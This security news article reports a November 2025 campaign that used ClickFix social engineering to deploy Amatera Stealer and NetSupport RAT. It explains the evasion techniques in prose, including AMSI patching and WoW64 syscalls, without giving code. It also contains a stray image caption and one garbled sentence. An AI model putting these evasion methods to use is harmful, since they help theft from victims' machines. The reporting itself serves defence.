In November 2025, a new malware campaign emerged that combines social engineering tricks with advanced stealing tools.
The attack starts when criminals trick users into running commands through the Windows Run window, a technique known as ClickFix.
Once users follow these instructions, their computers become infected with Amatera Stealer, an advanced piece of malware designed to steal sensitive information from browsers, wallets, and password managers.
Shortly after the initial infection, the attackers deploy NetSupport RAT, giving them full remote access to the victim’s computer.
eSentire security analysts identified the malware after the second paragraph, noting that this campaign represents a significant evolution in how attackers combine multiple tools for maximum damage.
The attack chain works through carefully crafted social engineering. Attackers convince users to open the Run prompt and execute specific commands.
These commands trigger a series of hidden stages that eventually deliver Amatera Stealer to the victim’s machine. What makes this particularly dangerous is how the malware hides its true purpose.
It uses obfuscated PowerShell code that has been deliberately made difficult to read and understand. The malware employs a special trick involving XOR encryption with the string “AMSI_RESULT_NOT_DETECTED” to decrypt the next stage while confusing security researchers.
.webp "EVALUSION Campaign Using ClickFix Technique to deploy Amatera Stealer and NetSupport RAT 3")
One of the most concerning aspects of this campaign involves the advanced evasion techniques used by Amatera Stealer. This malware was originally called ACR Stealer and was sold as a criminal service by a group called SheldIO.
Now rebranded as Amatera, the stealer uses WoW64 SysCalls to bypass common security tools like antivirus software and endpoint detection systems. This means even machines with strong security tools installed remain vulnerable.
The Infection Mechanism and Detection Evasion
The infection begins with a .NET-based downloader that retrieves and decrypts payloads using RC2 encryption from services like MediaFire.
This downloader is packed with Agile.net to make analysis harder for security teams. Once executed, it deploys a Pure Crypter-packed file that uses sophisticated process injection techniques.
The malware then disables AMSI (Anti-Malware Scan Interface) by overwriting the “AmsiScanBuffer” string in the system’s memory, effectively turning off Windows’ built-in security scanning for the rest of the attack.
Amatera communicates with its command servers using encrypted connections that bypass traditional security monitoring. It uses Windows APIs combined with WoW64 syscalls to encrypt all communications with AES-256-CBC, making traffic inspection nearly impossible.
The malware collects stolen data into zip files and sends them to criminal servers using these encrypted channels. Through its loader functionality, it can execute additional payloads selectively on valuable targets, such as computers containing cryptocurrency wallets or machines connected to business networks.
This selective approach helps attackers avoid wasting time on low-value targets and focus on organizations with real financial assets. The sophisticated nature of this campaign highlights why modern security requires multiple layers of protection.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
